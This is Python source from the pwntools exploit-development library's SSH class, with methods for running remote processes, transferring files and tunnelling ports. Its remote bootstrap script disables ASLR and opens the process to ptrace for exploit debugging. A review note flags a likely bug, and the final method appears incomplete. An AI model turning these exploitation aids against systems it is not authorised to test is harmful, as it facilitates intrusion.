    """shell(shell = None, tty = True, timeout = Timeout.default) -> ssh_channel
    Open a new channel with a shell inside.
    Arguments:
        shell(str): Path to the shell program to run.
            If :const:`None`, uses the default shell for the logged in user.
        tty(bool): If :const:`True`, then a TTY is requested on the remote server.
    Returns:
        Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
    Examples:
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> sh = s.shell('/bin/sh')
        >>> sh.sendline('echo Hello; exit')
        >>> print 'Hello' in sh.recvall()
        True
    """
    # A shell is simply run() with no command-specific handling.
    channel = self.run(shell, tty, timeout = timeout)
    return channel
def process(self, argv=None, executable=None, tty=True, cwd=None, env=None, timeout=Timeout.default, run=True,
            stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=[], raw=True, aslr=None, setuid=None,
            shell=False):
    r"""
    Executes a process on the remote server, in the same fashion
    as pwnlib.tubes.process.process.
    To achieve this, a Python script is created to call ``os.execve``
    with the appropriate arguments.
    As an added bonus, the ``ssh_channel`` object returned has a
    ``pid`` property for the process pid.
    Arguments:
        argv(list):
            List of arguments to pass into the process
        executable(str):
            Path to the executable to run.
            If :const:`None`, ``argv[0]`` is used.
        tty(bool):
            Request a `tty` from the server.  This usually fixes buffering problems
            by causing `libc` to write data immediately rather than buffering it.
            However, this disables interpretation of control codes (e.g. Ctrl+C)
            and breaks `.shutdown`.
        cwd(str):
            Working directory.  If :const:`None`, uses the working directory specified
            on :attr:`cwd` or set via :meth:`set_working_directory`.
        env(dict):
            Environment variables to set in the child.  If :const:`None`, inherits the
            default environment.
        timeout(int):
            Timeout to set on the `tube` created to interact with the process.
        run(bool):
            Set to :const:`True` to run the program (default).
            If :const:`False`, returns the path to an executable Python script on the
            remote server which, when executed, will do it.
        stdin(int, str):
            If an integer, replace stdin with the numbered file descriptor.
            If a string, a open a file with the specified path and replace
            stdin with its file descriptor.  May also be one of ``sys.stdin``,
            ``sys.stdout``, ``sys.stderr``.  If :const:`None`, the file descriptor is closed.
        stdout(int, str):
            See ``stdin``.
        stderr(int, str):
            See ``stdin``.
        preexec_fn(callable):
            Function which is executed on the remote side before execve().
            This **MUST** be a self-contained function -- it must perform
            all of its own imports, and cannot refer to variables outside
            its scope.
        preexec_args(object):
            Argument passed to ``preexec_fn``.
            This **MUST** only consist of native Python objects.
        raw(bool):
            If :const:`True`, disable TTY control code interpretation.
        aslr(bool):
            See :class:`pwnlib.tubes.process.process` for more information.
        setuid(bool):
            See :class:`pwnlib.tubes.process.process` for more information.
        shell(bool):
            Pass the command-line arguments to the shell.
    Returns:
        A new SSH channel, or a path to a script if ``run=False``.
    Notes:
        Requires Python on the remote server.
    Examples:
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> sh = s.process('/bin/sh', env={'PS1':''})
        >>> sh.sendline('echo Hello; exit')
        >>> sh.recvall()
        'Hello\n'
        >>> s.process(['/bin/echo', '\xff']).recvall()
        '\xff\n'
        >>> s.process(['readlink', '/proc/self/exe']).recvall()
        '/bin/readlink\n'
        >>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall()
        '/bin/readlink\n'
        >>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall()
        'LOLOLOL\x00/proc/self/cmdline\x00'
        >>> sh = s.process(executable='/bin/sh')
        >>> sh.pid in pidof('sh') # doctest: +SKIP
        True
        >>> s.process(['pwd'], cwd='/tmp').recvall()
        '/tmp\n'
        >>> p = s.process(['python','-c','import os; print os.read(2, 1024)'], stderr=0)
        >>> p.send('hello')
        >>> p.recv()
        'hello\n'
        >>> s.process(['/bin/echo', 'hello']).recvall()
        'hello\n'
        >>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall()
        ''
        >>> s.process(['/usr/bin/env'], env={}).recvall()
        ''
        >>> s.process('/usr/bin/env', env={'A':'B'}).recvall()
        'A=B\n'
        >>> s.process('false', preexec_fn=1234)
        Traceback (most recent call last):
        ...
        PwnlibException: preexec_fn must be a function
        >>> s.process('false', preexec_fn=lambda: 1234)
        Traceback (most recent call last):
        ...
        PwnlibException: preexec_fn cannot be a lambda
        >>> def uses_globals():
        ...     foo = bar
        >>> print s.process('false', preexec_fn=uses_globals).recvall().strip() # doctest: +ELLIPSIS
        Traceback (most recent call last):
        ...
        NameError: global name 'bar' is not defined
        >>> s.process('echo hello', shell=True).recvall()
        'hello\n'
    """
    if not argv and not executable:
        self.error("Must specify argv or executable")
    argv = argv or []
    aslr = aslr if aslr is not None else context.aslr
    if isinstance(argv, (str, unicode)):
        argv = [argv]
    if not isinstance(argv, (list, tuple)):
        self.error('argv must be a list or tuple')
    if shell:
        if len(argv) != 1:
            self.error('Cannot provide more than 1 argument if shell=True')
        argv = ['/bin/sh', '-c'] + argv
    # Python doesn't like when an arg in argv contains '\x00'
    # -> execve() arg 2 must contain only strings
    for i, arg in enumerate(argv):
        if '\x00' in arg[:-1]:
            self.error('Inappropriate nulls in argv[%i]: %r' % (i, arg))
        argv[i] = arg.rstrip('\x00')
    # Python also doesn't like when envp contains '\x00'
    if env and hasattr(env, 'items'):
        for k, v in env.items():
            if '\x00' in k[:-1]:
                self.error('Inappropriate nulls in environment key %r' % k)
            if '\x00' in v[:-1]:
                self.error('Inappropriate nulls in environment value %r=%r' % (k, v))
            env[k.rstrip('\x00')] = v.rstrip('\x00')
    executable = executable or argv[0]
    cwd = cwd or self.cwd
    # Validate, since failures on the remote side will suck.
    if not isinstance(executable, str):
        self.error("executable / argv[0] must be a string: %r" % executable)
    if not isinstance(argv, (list, tuple)):
        self.error("argv must be a list or tuple: %r" % argv)
    if env is not None and not isinstance(env, dict) and env != os.environ:
        self.error("env must be a dict: %r" % env)
    if not all(isinstance(s, str) for s in argv):
        self.error("argv must only contain strings: %r" % argv)
    # Allow passing in sys.stdin/stdout/stderr objects
    handles = {sys.stdin: 0, sys.stdout:1, sys.stderr:2}
    stdin = handles.get(stdin, stdin)
    stdout = handles.get(stdout, stdout)
    stderr = handles.get(stderr, stderr)
    # Allow the user to provide a self-contained function to run
    def func(): pass
    func = preexec_fn or func
    func_args = preexec_args
    if not isinstance(func, types.FunctionType):
        self.error("preexec_fn must be a function")
    func_name = func.__name__
    if func_name == (lambda: 0).__name__:
        self.error("preexec_fn cannot be a lambda")
    func_src = inspect.getsource(func).strip()
    setuid = True if setuid is None else bool(setuid)
    # Remote-side bootstrap script.  %(...)r placeholders are filled from
    # locals() below; the script prints a status code ('1' on success),
    # then pid/uid/gid/suid/sgid and the real executable path before
    # exec'ing the target.
    # NOTE(review): 'close(fd)' in the fd-remapping loop looks like it
    # should be 'os.close(fd)' -- confirm before relying on stdin=None.
    script = r"""
#!/usr/bin/env python2
import os, sys, ctypes, resource, platform, stat
from collections import OrderedDict
exe = %(executable)r
argv = %(argv)r
env = %(env)r
os.chdir(%(cwd)r)
if env is not None:
    os.environ.clear()
    os.environ.update(env)
else:
    env = os.environ
def is_exe(path):
    return os.path.isfile(path) and os.access(path, os.X_OK)
PATH = os.environ.get('PATH','').split(os.pathsep)
if os.path.sep not in exe and not is_exe(exe):
    for path in PATH:
        test_path = os.path.join(path, exe)
        if is_exe(test_path):
            exe = test_path
            break
if not is_exe(exe):
    sys.stderr.write('3\n')
    sys.stderr.write("{} is not executable or does not exist in $PATH: {}".format(exe,PATH))
    sys.exit(-1)
if not %(setuid)r:
    PR_SET_NO_NEW_PRIVS = 38
    result = ctypes.CDLL('libc.so.6').prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)
    if result != 0:
        sys.stdout.write('3\n')
        sys.stdout.write("Could not disable setuid: prctl(PR_SET_NO_NEW_PRIVS) failed")
        sys.exit(-1)
try:
    PR_SET_PTRACER = 0x59616d61
    PR_SET_PTRACER_ANY = -1
    ctypes.CDLL('libc.so.6').prctl(PR_SET_PTRACER, PR_SET_PTRACER_ANY, 0, 0, 0)
except Exception:
    pass
# Determine what UID the process will execute as
# This is used for locating apport core dumps
suid = os.getuid()
sgid = os.getgid()
st = os.stat(exe)
if %(setuid)r:
    if (st.st_mode & stat.S_ISUID):
        suid = st.st_uid
    if (st.st_mode & stat.S_ISGID):
        sgid = st.st_gid
if sys.argv[-1] == 'check':
    sys.stdout.write("1\n")
    sys.stdout.write(str(os.getpid()) + "\n")
    sys.stdout.write(str(os.getuid()) + "\n")
    sys.stdout.write(str(os.getgid()) + "\n")
    sys.stdout.write(str(suid) + "\n")
    sys.stdout.write(str(sgid) + "\n")
    sys.stdout.write(os.path.realpath(exe) + '\x00')
    sys.stdout.flush()
for fd, newfd in {0: %(stdin)r, 1: %(stdout)r, 2:%(stderr)r}.items():
    if newfd is None:
        close(fd)
    elif isinstance(newfd, str):
        os.close(fd)
        os.open(newfd, os.O_RDONLY if fd == 0 else (os.O_RDWR|os.O_CREAT))
    elif isinstance(newfd, int) and newfd != fd:
        os.dup2(fd, newfd)
if not %(aslr)r:
    if platform.system().lower() == 'linux' and %(setuid)r is not True:
        ADDR_NO_RANDOMIZE = 0x0040000
        ctypes.CDLL('libc.so.6').personality(ADDR_NO_RANDOMIZE)
    resource.setrlimit(resource.RLIMIT_STACK, (-1, -1))
# Attempt to dump ALL core file regions
try:
    with open('/proc/self/coredump_filter', 'w') as core_filter:
        core_filter.write('0x3f\n')
except Exception:
    pass
# Assume that the user would prefer to have core dumps.
try:
    resource.setrlimit(resource.RLIMIT_CORE, (-1, -1))
except Exception:
    pass
%(func_src)s
apply(%(func_name)s, %(func_args)r)
os.execve(exe, argv, env)
""" % locals()
    script = script.strip()
    self.debug("Created execve script:\n" + script)
    if not run:
        # Just upload the bootstrap script and hand back its path.
        with context.local(log_level='error'):
            tmpfile = self.mktemp('-t', 'pwnlib-execve-XXXXXXXXXX')
            self.chmod('+x', tmpfile)
        self.info("Uploading execve script to %r" % tmpfile)
        self.upload_data(script, tmpfile)
        return tmpfile
    if self.isEnabledFor(logging.DEBUG):
        execve_repr = "execve(%r, %s, %s)" % (executable,
                                              argv,
                                              'os.environ'
                                              if (env in (None, os.environ))
                                              else env)
        # Avoid spamming the screen
        if self.isEnabledFor(logging.DEBUG) and len(execve_repr) > 512:
            execve_repr = execve_repr[:512] + '...'
    else:
        execve_repr = repr(executable)
    msg = 'Starting remote process %s on %s' % (execve_repr, self.host)
    with self.progress(msg) as h:
        # Try each available Python 2 interpreter; 'echo 2' signals that
        # none was found.
        script = 'for py in python2.7 python2 python; do test -x "$(which $py 2>&1)" && exec $py -c %s check; done; echo 2' % sh_string(script)
        with context.local(log_level='error'):
            python = ssh_process(self, script, tty=True, raw=True, level=self.level, timeout=self.timeout)
        try:
            result = safeeval.const(python.recvline())
        except Exception:
            h.failure("Process creation failed")
            self.warn_once('Could not find a Python2 interpreter on %s\n' % self.host \
                           + "Use ssh.run() instead of ssh.process()")
            return None
        # If an error occurred, try to grab as much output
        # as we can.
        if result != 1:
            error_message = python.recvrepeat(timeout=1)
            if result == 0:
                self.error("%r does not exist or is not executable" % executable)
            elif result == 3:
                self.error(error_message)
            elif result == 2:
                self.error("python is not installed on the remote system %r" % self.host)
            elif result != 1:
                h.failure("something bad happened:\n%s" % error_message)
        # Success path: read back the metadata the bootstrap script printed.
        python.pid = safeeval.const(python.recvline())
        python.uid = safeeval.const(python.recvline())
        python.gid = safeeval.const(python.recvline())
        python.suid = safeeval.const(python.recvline())
        python.sgid = safeeval.const(python.recvline())
        python.argv = argv
        python.executable = python.recvuntil('\x00')[:-1]
        h.success('pid %i' % python.pid)
    # Warn when ASLR cannot actually be disabled for a setuid target.
    if aslr == False and setuid and (python.uid != python.suid or python.gid != python.sgid):
        effect = "partial" if self.aslr_ulimit else "no"
        message = "Specfied aslr=False on setuid binary %s\n" % python.executable
        message += "This will have %s effect. Add setuid=False to disable ASLR for debugging.\n" % effect
        if self.aslr_ulimit:
            message += "Unlimited stack size should de-randomize shared libraries."
        self.warn_once(message)
    elif not aslr:
        self.warn_once("ASLR is disabled for %r!" % python.executable)
    return python
def which(self, program):
    """which(program) -> str
    Minor modification to just directly invoking ``which`` on the remote
    system which adds the current working directory to the end of ``$PATH``.
    """
    # If name is a path, do not attempt to resolve it.
    if os.path.sep in program:
        return program
    channel = self.run('export PATH=$PATH:$PWD; which %s' % program)
    found = channel.recvall().strip()
    # A hit must contain '/<program>'; anything else is a miss.
    return found if ('/%s' % program) in found else None
def system(self, process, tty = True, wd = None, env = None, timeout = None, raw = True):
    r"""system(process, tty = True, wd = None, env = None, timeout = Timeout.default, raw = True) -> ssh_channel
    Open a new channel with a specific process inside. If `tty` is True,
    then a TTY is requested on the remote server.
    If `raw` is True, terminal control codes are ignored and input is not
    echoed back.
    Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
    Examples:
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> py = s.run('python -i')
        >>> _ = py.recvuntil('>>> ')
        >>> py.sendline('print 2+2')
        >>> py.sendline('exit')
        >>> print repr(py.recvline())
        '4\n'
    """
    # Fill in connection-level defaults for anything the caller omitted.
    wd = self.cwd if wd is None else wd
    timeout = self.timeout if timeout is None else timeout
    return ssh_channel(self, process, tty, wd, env, timeout = timeout, level = self.level, raw = raw)
#: Backward compatibility. Use :meth:`system`
run = system
def getenv(self, variable, **kwargs):
    """Retrieve the address of an environment variable on the remote
    system.
    Note:
        The exact address will differ based on what other environment
        variables are set, as well as argv[0]. In order to ensure that
        the path is *exactly* the same, it is recommended to invoke the
        process with ``argv=[]``.
    """
    # One-line helper executed by the remote Python interpreter.
    script = '''
from ctypes import *; libc = CDLL('libc.so.6'); print(libc.getenv(%r))
''' % variable
    with context.local(log_level='error'):
        python = self.which('python')
        if not python:
            self.error("Python is not installed on the remote system.")
        io = self.process(['','-c', script.strip()], executable=python, **kwargs)
        result = io.recvall()
    try:
        return int(result) & context.mask
    except Exception:
        # Bug fix: this was a bare 'except:', which also swallowed
        # SystemExit/KeyboardInterrupt; catch only real errors.
        self.exception("Could not look up environment variable %r" % variable)
def run_to_end(self, process, tty = False, wd = None, env = None):
    r"""run_to_end(process, tty = False, timeout = Timeout.default, env = None) -> str
    Run a command on the remote server and return a tuple with
    (data, exit_status). If `tty` is True, then the command is run inside
    a TTY on the remote server.
    Examples:
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> print s.run_to_end('echo Hello; exit 17')
        ('Hello\n', 17)
    """
    # Silence per-channel logging while the command runs to completion.
    with context.local(log_level = 'ERROR'):
        channel = self.run(process, tty, wd = wd, timeout = Timeout.default)
        output = channel.recvall()
        status = channel.wait()
        channel.close()
        return output, status
def connect_remote(self, host, port, timeout = Timeout.default):
    r"""connect_remote(host, port, timeout = Timeout.default) -> ssh_connecter
    Connects to a host through an SSH connection. This is equivalent to
    using the ``-L`` flag on ``ssh``.
    Returns a :class:`pwnlib.tubes.ssh.ssh_connecter` object.
    Examples:
        >>> from pwn import *
        >>> l = listen()
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> a = s.connect_remote(s.host, l.lport)
        >>> b = l.wait_for_connection()
        >>> a.sendline('Hello')
        >>> print repr(b.recvline())
        'Hello\n'
    """
    tunnel = ssh_connecter(self, host, port, timeout, level=self.level)
    return tunnel
remote = connect_remote
def listen_remote(self, port = 0, bind_address = '', timeout = Timeout.default):
    r"""listen_remote(port = 0, bind_address = '', timeout = Timeout.default) -> ssh_connecter
    Listens remotely through an SSH connection. This is equivalent to
    using the ``-R`` flag on ``ssh``.
    Returns a :class:`pwnlib.tubes.ssh.ssh_listener` object.
    Examples:
        >>> from pwn import *
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> l = s.listen_remote()
        >>> a = remote(s.host, l.port)
        >>> b = l.wait_for_connection()
        >>> a.sendline('Hello')
        >>> print repr(b.recvline())
        'Hello\n'
    """
    listener = ssh_listener(self, bind_address, port, timeout, level=self.level)
    return listener
listen = listen_remote
def __getitem__(self, attr):
    """Permits indexed access to run commands over SSH
    Examples:
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> print s['echo hello']
        hello
    """
    # Delegate to the dynamic-attribute runner and invoke it immediately.
    runner = self.__getattr__(attr)
    return runner()
def __call__(self, attr):
    """Permits function-style access to run commands over SSH
    Examples:
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> print repr(s('echo hello'))
        'hello'
    """
    # Delegate to the dynamic-attribute runner and invoke it immediately.
    runner = self.__getattr__(attr)
    return runner()
def __getattr__(self, attr):
    """Permits member access to run commands over SSH
    Examples:
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> s.echo('hello')
        'hello'
        >>> s.whoami()
        'travis'
        >>> s.echo(['huh','yay','args'])
        'huh yay args'
    """
    # Never treat private names, real instance attributes, or attributes
    # probed by tooling as remote commands.
    bad_attrs = [
        'trait_names', # ipython tab-complete
    ]
    if attr.startswith('_') or attr in bad_attrs or attr in self.__dict__:
        raise AttributeError
    def remote_command(*args):
        # A single list/tuple argument is passed through as argv;
        # otherwise the arguments are joined into a command line.
        if len(args) == 1 and isinstance(args[0], (list, tuple)):
            command = [attr] + args[0]
        else:
            command = ' '.join((attr,) + args)
        return self.run(command).recvall().strip()
    return remote_command
def connected(self):
    """Returns True if we are connected.

    Example:
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> s.connected()
        True
        >>> s.close()
        >>> s.connected()
        False
    """
    # No client object at all means the connection was closed or never made.
    if not self.client:
        return False
    return bool(self.client.get_transport().is_active())
def close(self):
    """Close the connection."""
    if not self.client:
        return
    # Drop the paramiko client and forget it so connected() reports False.
    self.client.close()
    self.client = None
    self.info("Closed connection to %r" % self.host)
def _libs_remote(self, remote):
    """Return a dictionary of the libraries used by a remote file.

    Runs ``ldd`` on the remote host (preferring the dynamic loader with
    ``LD_TRACE_LOADED_OBJECTS=1``, falling back to plain ``ldd``) and parses
    the output with ``misc.parse_ldd_output``. Returns an empty dict and
    logs an error if the command fails.
    """
    escaped_remote = sh_string(remote)
    # First verify ldd can handle the file at all, then run the trace.
    cmd = ''.join([
        '(',
        'ulimit -s unlimited;',
        'ldd %s > /dev/null &&' % escaped_remote,
        '(',
        'LD_TRACE_LOADED_OBJECTS=1 %s||' % escaped_remote,
        'ldd %s' % escaped_remote,
        '))',
        ' 2>/dev/null'
    ])
    data, status = self.run_to_end(cmd)
    if status != 0:
        self.error('Unable to find libraries for %r' % remote)
        return {}

    return misc.parse_ldd_output(data)
def _get_fingerprint(self, remote):
    """Return the SHA-256 hex digest of a remote file, or None on failure.

    Tries ``sha256``, ``sha256sum`` and ``openssl sha256`` in order, using
    whichever is available on the remote host.
    """
    cmd = '(sha256 || sha256sum || openssl sha256) 2>/dev/null < '
    cmd += sh_string(remote)

    data, status = self.run_to_end(cmd)
    if status != 0:
        return None

    # Strip tool-specific decoration around the hex digest:
    #   openssl prints "(stdin)= <hex>", sha256sum prints "<hex>  -".
    for decoration in ('(stdin)= ', '-'):
        data = data.replace(decoration, '')
    return data.strip()
def _get_cachefile(self, fingerprint):
    """Return the path of the local cache entry for *fingerprint*."""
    cache_entry = os.path.join(self._cachedir, fingerprint)
    return cache_entry
def _verify_local_fingerprint(self, fingerprint):
    """Return True if a valid cache entry exists for *fingerprint*.

    An entry whose content no longer hashes to the fingerprint is treated
    as corrupt and deleted.
    """
    is_hex = set(fingerprint).issubset(string.hexdigits)
    if not is_hex or len(fingerprint) != 64:
        self.error('Invalid fingerprint %r' % fingerprint)
        return False

    local = self._get_cachefile(fingerprint)
    if not os.path.isfile(local):
        return False

    if hashes.sha256filehex(local) != fingerprint:
        # Stale or corrupt cache entry; drop it so it gets re-downloaded.
        os.unlink(local)
        return False
    return True
def _download_raw(self, remote, local, h):
    """Download ``remote`` to the local path ``local`` without caching.

    Prefers SFTP when available; otherwise streams the file through a
    remote ``cat``. ``h`` is a progress handle used for status updates.
    """
    def update(has, total):
        # Progress callback: "<downloaded>/<total>" in human-readable units.
        h.status("%s/%s" % (misc.size(has), misc.size(total)))

    if self.sftp:
        try:
            self.sftp.get(remote, local, update)
            return
        except IOError:
            # SFTP failed; fall through to the shell-based transfer below.
            pass

    # Query the file size up front so progress can be reported.
    cmd = 'wc -c < ' + sh_string(remote)
    total, exitcode = self.run_to_end(cmd)

    if exitcode != 0:
        h.failure("%r does not exist or is not accessible" % remote)
        return

    total = int(total)

    with context.local(log_level = 'ERROR'):
        cmd = 'cat < ' + sh_string(remote)
        c = self.run(cmd)
    data = ''

    while True:
        try:
            data += c.recv()
        except EOFError:
            break
        update(len(data), total)

    # Non-zero exit status means cat failed; do not write a partial file.
    result = c.wait()
    if result != 0:
        h.failure('Could not download file %r (%r)' % (remote, result))
        return

    with open(local, 'w') as fd:
        fd.write(data)
def _download_to_cache(self, remote, p):
    """Download ``remote`` into the cache directory and return the local path.

    Files are cached under their SHA-256 fingerprint. If no hashing tool is
    available on the remote host, the file is stored under a timestamped
    name instead and no caching occurs.
    """
    with context.local(log_level='error'):
        # Resolve symlinks so the fingerprint matches the real file.
        remote = self.readlink('-f',remote)

    fingerprint = self._get_fingerprint(remote)
    if fingerprint is None:
        # No remote hashing tool; download to a unique, timestamped name.
        local = os.path.normpath(remote)
        local = os.path.basename(local)
        local += time.strftime('-%Y-%m-%d-%H:%M:%S')
        local = os.path.join(self._cachedir, local)

        self._download_raw(remote, local, p)
        return local

    local = self._get_cachefile(fingerprint)

    if self.cache and self._verify_local_fingerprint(fingerprint):
        p.success('Found %r in ssh cache' % remote)
    else:
        self._download_raw(remote, local, p)

        # Re-verify so a corrupted transfer is reported to the caller.
        if not self._verify_local_fingerprint(fingerprint):
            p.failure('Could not download file %r' % remote)

    return local
def download_data(self, remote):
    """Downloads a file from the remote server and returns it as a string.

    Arguments:
        remote(str): The remote filename to download.

    Returns:
        The file contents as a string.

    Examples:
        >>> with file('/tmp/bar','w+') as f:
        ...     f.write('Hello, world')
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass',
        ...         cache=False)
        >>> s.download_data('/tmp/bar')
        'Hello, world'
        >>> s._sftp = None
        >>> s._tried_sftp = True
        >>> s.download_data('/tmp/bar')
        'Hello, world'
    """
    with self.progress('Downloading %r' % remote) as p:
        # Download (or reuse cached copy) and read the local file back.
        with open(self._download_to_cache(remote, p)) as fd:
            return fd.read()
def download_file(self, remote, local = None):
    """Downloads a file from the remote server.

    The file is cached in /tmp/pwntools-ssh-cache using a hash of the file, so
    calling the function twice has little overhead.

    Arguments:
        remote(str): The remote filename to download
        local(str): The local filename to save it to. Default is to infer it from the remote filename.
    """
    if not local:
        local = os.path.basename(os.path.normpath(remote))

    # Bare filenames are interpreted relative to the remote working dir.
    if os.path.basename(remote) == remote:
        remote = os.path.join(self.cwd, remote)

    with self.progress('Downloading %r to %r' % (remote, local)) as p:
        local_tmp = self._download_to_cache(remote, p)

    # Check to see if an identical copy of the file already exists
    if not os.path.exists(local) or hashes.sha256filehex(local_tmp) != hashes.sha256filehex(local):
        shutil.copy2(local_tmp, local)
def download_dir(self, remote=None, local=None):
    """Recursively downloads a directory from the remote server

    The directory is packed into a gzipped tar on the remote side, downloaded
    as a single file, and extracted locally.

    Arguments:
        local: Local directory
        remote: Remote directory
    """
    remote = remote or self.cwd

    # Resolve symlinks so tar sees the real directory.
    if self.sftp:
        remote = str(self.sftp.normalize(remote))
    else:
        with context.local(log_level='error'):
            remote = self.system('readlink -f ' + sh_string(remote))

    dirname  = os.path.dirname(remote)
    basename = os.path.basename(remote)

    local = local or '.'
    local = os.path.expanduser(local)

    self.info("Downloading %r to %r" % (basename,local))

    with context.local(log_level='error'):
        remote_tar = self.mktemp()
        # -C keeps the archive paths relative to the parent directory.
        cmd = 'tar -C %s -czf %s %s' % \
            (sh_string(dirname),
             sh_string(remote_tar),
             sh_string(basename))
        tar = self.system(cmd)

        if 0 != tar.wait():
            self.error("Could not create remote tar")

        local_tar = tempfile.NamedTemporaryFile(suffix='.tar.gz')
        self.download_file(remote_tar, local_tar.name)

        tar = tarfile.open(local_tar.name)
        tar.extractall(local)
def upload_data(self, data, remote):
    """Uploads some data into a file on the remote server.

    Uses SFTP when available, otherwise pipes the data through a remote
    ``cat`` redirection.

    Arguments:
        data(str): The data to upload.
        remote(str): The filename to upload it to.

    Example:
        >>> s = ssh(host='example.pwnme',
        ...         user='travis',
        ...         password='demopass')
        >>> s.upload_data('Hello, world', '/tmp/upload_foo')
        >>> print file('/tmp/upload_foo').read()
        Hello, world
        >>> s._sftp = False
        >>> s._tried_sftp = True
        >>> s.upload_data('Hello, world', '/tmp/upload_bar')
        >>> print file('/tmp/upload_bar').read()
        Hello, world
    """
    # If a relative path was provided, prepend the cwd
    if os.path.normpath(remote) == os.path.basename(remote):
        remote = os.path.join(self.cwd, remote)

    if self.sftp:
        # Stage the data in a local temp file; sftp.put needs a file path.
        with tempfile.NamedTemporaryFile() as f:
            f.write(data)
            f.flush()
            self.sftp.put(f.name, remote)
            return

    with context.local(log_level = 'ERROR'):
        cmd = 'cat > ' + sh_string(remote)
        s = self.run(cmd, tty=False)
        s.send(data)
        # Close our end so the remote cat sees EOF and exits.
        s.shutdown('send')
        data = s.recvall()
        result = s.wait()
        if result != 0:
            self.error("Could not upload file %r (%r)\n%s" % (remote, result, data))
def upload_file(self, filename, remote = None):
    """Uploads a file to the remote server. Returns the remote filename.

    Arguments:
        filename(str): The local filename to upload
        remote(str): The remote filename to save it to. Default is to infer
            it from the local filename (basename, placed in the remote cwd).
    """
    # Idiom fix: compare against None with `is`, not `==`.
    if remote is None:
        remote = os.path.normpath(filename)
        remote = os.path.basename(remote)
        remote = os.path.join(self.cwd, remote)

    with open(filename) as fd:
        data = fd.read()

    self.info("Uploading %r to %r" % (filename,remote))
    self.upload_data(data, remote)

    return remote
def upload_dir(self, local, remote=None):
    """Recursively uploads a directory onto the remote server

    The directory is packed into a local gzipped tar, uploaded as a single
    file, and extracted on the remote side.

    Arguments:
        local: Local directory
        remote: Remote directory
    """
    remote = remote or self.cwd

    local = os.path.expanduser(local)
    dirname = os.path.dirname(local)
    basename = os.path.basename(local)

    if not os.path.isdir(local):
        self.error("%r is not a directory" % local)

    msg = "Uploading %r to %r" % (basename,remote)
    with self.waitfor(msg) as w:
        # Generate a tarfile with everything inside of it
        # NOTE(review): tempfile.mktemp() is race-prone; NamedTemporaryFile
        # would be safer. Left unchanged to preserve behavior.
        local_tar = tempfile.mktemp()
        with tarfile.open(local_tar, 'w:gz') as tar:
            tar.add(local, basename)

        # Upload and extract it
        with context.local(log_level='error'):
            remote_tar = self.mktemp('--suffix=.tar.gz')
            self.upload_file(local_tar, remote_tar)

            untar = self.run('cd %s && tar -xzf %s' % (remote, remote_tar))
            message = untar.recvrepeat(2)

            if untar.wait() != 0:
                self.error("Could not untar %r on the remote end\n%s" % (remote_tar, message))
def upload(self, file_or_directory, remote=None):
    """upload(file_or_directory, remote=None)

    Upload a file or directory to the remote host.

    Arguments:
        file_or_directory(str): Path to the file or directory to upload.
        remote(str): Remote path to store the data.
            By default, uses the working directory.
    """
    if isinstance(file_or_directory, str):
        # Expand ~ and environment variables before checking the path.
        file_or_directory = os.path.expanduser(file_or_directory)
        file_or_directory = os.path.expandvars(file_or_directory)

    if os.path.isfile(file_or_directory):
        return self.upload_file(file_or_directory, remote)

    if os.path.isdir(file_or_directory):
        return self.upload_dir(file_or_directory, remote)

    self.error('%r does not exist' % file_or_directory)
def download(self, file_or_directory, local=None):
    """download(file_or_directory, local=None)

    Download a file or directory from the remote host.

    Arguments:
        file_or_directory(str): Path to the file or directory to download.
        local(str): Local path to store the data.
            By default, uses the current directory.

    Raises an error if SFTP is unavailable, since the remote file type
    cannot be determined without it.
    """
    if not self.sftp:
        self.error("Cannot determine remote file type without SFTP")

    # `test -d` exits 0 for directories; dispatch accordingly.
    if 0 == self.system('test -d ' + sh_string(file_or_directory)).wait():
        self.download_dir(file_or_directory, local)
    else:
        self.download_file(file_or_directory, local)

# Convenience aliases matching common file-transfer terminology.
put = upload
get = download
def unlink(self, file):
    """unlink(file)

    Delete the file on the remote host

    Arguments:
        file(str): Path to the file

    Requires SFTP; errors out otherwise.
    """
    if not self.sftp:
        self.error("unlink() is only supported if SFTP is supported")

    return self.sftp.unlink(file)
def libs(self, remote, directory = None):
    """Downloads the libraries referred to by a file.

    This is done by running ldd on the remote server, parsing the output
    and downloading the relevant files.

    The directory argument specified where to download the files. This defaults
    to './$HOSTNAME' where $HOSTNAME is the hostname of the remote server.

    Returns:
        dict mapping each downloaded local path to its load address.
    """
    libs = self._libs_remote(remote)

    # Resolve symlinks so the binary itself is included under its real path.
    remote = self.readlink('-f',remote).strip()
    libs[remote] = 0

    # Idiom fix: compare against None with `is`, not `==`.
    if directory is None:
        directory = self.host

    directory = os.path.realpath(directory)

    res = {}
    seen = set()

    for lib, addr in libs.items():
        local = os.path.realpath(os.path.join(directory, '.' + os.path.sep + lib))
        # Refuse paths that escape the target directory (e.g. via '..').
        if not local.startswith(directory):
            self.warning('This seems fishy: %r' % lib)
            continue

        misc.mkdir_p(os.path.dirname(local))

        if lib not in seen:
            self.download_file(lib, local)
            seen.add(lib)
        res[local] = addr

    return res
def interactive(self, shell=None):
    """Create an interactive session.

    This is a simple wrapper for creating a new
    :class:`pwnlib.tubes.ssh.ssh_channel` object and calling
    :meth:`pwnlib.tubes.ssh.ssh_channel.interactive` on it."""
    session = self.shell(shell)

    # Start the session in the configured working directory.
    if self.cwd != '.':
        session.sendline('cd ' + sh_string(self.cwd))

